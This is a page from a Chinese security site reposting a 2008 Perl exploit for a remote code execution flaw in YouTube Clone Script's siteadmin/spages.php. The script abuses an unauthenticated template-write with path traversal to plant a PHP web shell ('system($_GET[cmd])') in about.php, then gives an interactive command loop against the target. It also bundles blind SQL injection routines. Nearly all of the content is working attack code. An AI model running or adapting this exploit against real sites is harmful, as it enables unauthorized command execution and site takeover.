首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 YouTube Clone Script (spages.php) Remote Code Execution Exploit 来源：www.vfocus.net 作者：inphex 发布时间：2008-04-24   #!/usr/bin/perl #inphex #/siteadmin/spages.php #        include("../include/config.php"); #        include("../include/function.php"); # #        if($_REQUEST['update']) #        { #                $file_path = $config['BASE_DIR']."/templates/".$_REQUEST['page']; #                if(file_exists($file_path)) #                { #                        $handle = fopen($config['BASE_DIR']."/templates/".$_REQUEST['page'], "w"); #                        fwrite($handle,stripslashes($_POST['body'])); #                        fclose($handle); #                        $msg = "Page updated successfully"; #                } #                else #                        $err = "Page does not exist"; #        } # #        STemplate::assign('msg',$msg); #        STemplate::assign('err',$err); #        STemplate::display("siteadmin/spages.tpl"); # #Very easy one... #YouTube-Clone-Script is quite buggy,there are more bugs. use Digest::MD5 qw(md5 md5_hex md5_base64); use LWP::UserAgent; use HTTP::Cookies; use Switch; $host_ = shift; $path_ = shift; print "usage: $0 http://host /path/\n"; $info{'info'} = { "author" => ["inphex"], "name" => ["YouTube Clone Script Remote Code Execution"], "version" => [], "description" => ["This Script will exploit a Remote Code Execution vulnerability existing in the YouTube Clone Script\n"], "options" => { "agent" => "",  "proxy" => "",  "default_headers" => [  ["key","value"]], "timeout" => 2, "cookie" =>     { "cookie" => ["key=value"], }, }, "sending_options" => { "host" => $host_, "path" => $path_."siteadmin/spages.php",               "port" => 80,                  "method_a" => "REMOTE_CHECK",  "attack" => { "update" => ["get","update","1"],  "path" => ["get","page","../about.php"], "content" => ["post","body","<?php echo system(\$_GET[cmd]); ?>"], }, }, }; &start($info{'info'},222); do { print "\$";$cmd = <STDIN>;chomp($cmd); $info{'info'} = { "options" =>{"agent" => "",  "proxy" => "",  "default_headers" => [  ["key","value"]], "timeout" => 2, "cookie" =>     {"cookie" => ["key=value"],},},"sending_options" =>{"host" => $host_, "path" => $path_."about.php",           "port" => 80,                  "method_a" => "CODE_EXECUTION",  "attack" =>{"cmd" => ["get","cmd",$cmd],  },},};     &start($info{'info'},221);     $content = ${$info{'info'}}{221}{'content'};     print $content; print "\n"; } while (1); sub start { $a_ = shift; @EXPORT = qw( start $return $a_ ); $id = shift; $get_dA = get_d_p_s("get"); $post_dA = get_d_p_s("post"); my ($x,$c,$m,$h,$ff,$kf,$hp,$c,$cccc) = (0,0,0,0,0,0,0,0,0); my $jj = 1; my $ii = 48;     my $hh = 1; my $ppp = 0; my $s = shift; my $a = ""; my $res_p = ""; my $h = ""; ($h_host_h_xdsjaop,$h_path_h_xdsjaop,$h_port_h_xdsjaop,$method_m) = ($a_->{'sending_options'}{'host'},$a_->{'sending_options'}{'path'},$a_->{'sending_options'}{'port'},$a_->{'sending_options'}{'method_a'}); $ua = LWP::UserAgent->new; $ua->timeout($a_->{'options'}{'timeout'});  if ($a_->{'options'}{'proxy'}) {     $ua->proxy(['http', 'ftp'] => $a_->{'options'}{'proxy'}); } $agent = $a_->{'options'}{'agent'} || "Mozilla/5.0"; $ua->agent($agent); {                                                 while (($k,$v) = each(%{$a_})) { if ($k ne "options" && $k ne "sending_options") { foreach $r (@{$a_->{$k}}) { if ($a_->{$k}[0]) { print $k.":".$a_->{$k}[0]."\n"; } } } } foreach $j (@{$a_->{'options'}{'default_headers'}}) {    $ua->default_headers->push_header($a_->{'options'}{'default_headers'}[$m][0] => $a_->{'options'}{'default_headers'}[$m][1]); $m++; } if ($a_->{'options'}{'cookie'}{'cookie'}[0]) {          $ua->default_headers->push_header('Cookie' => $a_->{'options'}{'cookie'}{'cookie'}[0]); } } switch ($method_m)        { case "attack" { &attack();} case "SQL_INJECTION_BLIND" { &sql_injection_blind();} case "REMOTE_COMMAND_EXECUTION" { &attack();} case "REMOTE_CODE_EXECUTION" {&attack();} case "REMOTE_FILE_INCLUSION" { &attack();} case "LOCAL_FILE_INCLUSION" { &attack(); } else { &attack(); }  } sub attack { if ($post_dA eq "") { $method = "get"; } elsif ($post_dA ne "") { $method = "post"; } if ($method eq "get") {  $res_p = get_data($h_host_h_xdsjaop,$h_path_h_xdsjaop."?".$get_dA); ${$a_}{$id}{'content'} = $res_p; foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}}) { $res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/; while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1]) { if (${$jj} ne "") { ${$a_}{$id}{'regex'}[$h] = ${$jj}; } $jj++; } $h++; } } elsif ($method eq "post") { $res_p = post_data($h_host_h_xdsjaop,$h_path_h_xdsjaop."?".$get_dA,"application/x-www-form-urlencoded",$post_dA); ${$a_}{$id}{'content'} = $res_p; foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}}) { $res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/; while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1]) { if (${$jj} ne "") { ${$a_}{$id}{'regex'}[$h] = ${$jj}; } $jj++; } $h++; } } } sub sql_injection_blind { while () { while ($ii <= 90) { if(check($ii,$hh) == 1) { syswrite STDOUT,lc(chr($ii)); $hh++; $chr = $chr.chr($ii); } $ii++; } push(@ffs,length($chr)); if (($#ffs -1) == $ffs) { print "\nFinished/Error\n"; exit; } $ii = 48; } } sub check($$) { $ii = shift; $hh = shift; if (get_d_p_s("post") ne "") { $method = "post"; } else { $method = "get";} if ($method eq "get") { $ppp++; $query = modify($get_dA,$ii,$hh); print $ii."-".$hh."\n"; $res_p = get_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}."?".$query); foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}}) { if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/) { return 1; } else { return 0; } $h++; } } elsif ($method eq "post") { $ppp++; $query_g = modify($get_dA,$ii,$hh); $query_p = modify($post_dA,$ii,$hh); $res_p = post_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}."?".$query_g,"application/x-www-form-urlencoded",$query_p); foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}}) { if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/) { return 1; } else { return 0; } $h++; } } }     sub modify($$$) {     $string = shift;     $replace_by = shift;     $replace_by1 = shift;     if ($string !~/\$i/ && $string !~/\$h/) {     print $string;         } elsif ($string !~/\$i/) {         $ff = substr($string,0,index($string,"\$h"));             $ee =  substr($string,rindex($string,"\$h")+2);             $string = $ff.$replace_by1.$ee;             return $string; } elsif ($string !~/\$h/) {         $f = substr($string,0,index($string,"\$i"));         $e = substr($string,rindex($string,"\$i")+2);         $string = $f.$replace_by.$e;     return $string; } else {     $f = substr($string,0,index($string,"\$i"));         $e = substr($string,rindex($string,"\$i")+2);         $string = $f.$replace_by.$e;     $ff = substr($string,0,index($string,"\$h"));         $ee =  substr($string,rindex($string,"\$h")+2);         $string = $ff.$replace_by1.$ee;     return $string; } } sub get_d_p_s { $g_d_p_s = shift; $post_data = ""; $get_data = ""; $header_data = ""; %header_dA = (); while (($k,$v) = each(%{$a_->{'sending_options'}{'attack'}})) { if ($a_->{'sending_options'}{'attack'}{$k}[0] =~ "get") { $method = "get"; push(@get,$a_->{'sending_options'}{'attack'}{$k}[1]."=".$a_->{'sending_options'}{'attack'}{$k}[2]); } elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~ "post") { $method = "post"; push(@post,$a_->{'sending_options'}{'attack'}{$k}[1]."=".$a_->{'sending_options'}{'attack'}{$k}[2]); } elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~ "header") {         $header_dA{$a_->{'sending_options'}{'attack'}{$k}[1]} = $a_->{'sending_options'}{'attack'}{$k}[2]; } $hp++; } $yy = $#get; while ($bb <= $#get) { $get_data .= $get[$yy]."&"; $bb++; $yy--; } $l = $#post; while ($k <= $#post) { $post_data .= $post[$l]."&"; $k++; $l--; } if ($g_d_p_s eq "get") { return $get_data; } elsif ($g_d_p_s eq "post") { return $post_data; } elsif ($g_d_p_s eq "header") { return %header_dA; } } sub get_data { $h_host_h_xdsjaop = shift; $h_path_h_xdsjaop = shift; %hash = get_d_p_s("header");     while (($u,$c) = each(%hash)) { $ua->default_headers->push_header($u => $c); } $req = $ua->get($h_host_h_xdsjaop.$h_path_h_xdsjaop); return $req->content; } sub post_data { $h_host_h_xdsjaop = shift; $h_path_h_xdsjaop = shift; $content_type = shift; $send = shift; %hash = get_d_p_s("header");     while (($u,$c) = each(%hash)) {     $ua->default_headers->push_header($u => $c); } $req = HTTP::Request->new(POST => $h_host_h_xdsjaop.$h_path_h_xdsjaop); $req->content_type($content_type); $req->content($send); $res = $ua->request($req); return $res->content; } }   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Zune Software ActiveX Arbitrar ·又见0day! [FlashGet]-FG2CatchU ·Web Calendar <= 4.1 Blind SQL ·DivX Player 6.7 SRT File Subti ·RedDot CMS 7.5 (LngId) Remote ·HP Software Update (Hpufunctio ·Adobe Album Starter 3.2 Unchec ·VLC 0.8.6d httpd_FileCallBack ·SubEdit Player build 4066 subt ·MS Windows XP SP2 (win32k.sys) ·PHP-Fusion 6.00.307 Remote Bli ·GroupWise 7.0 (mailto: scheme)   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved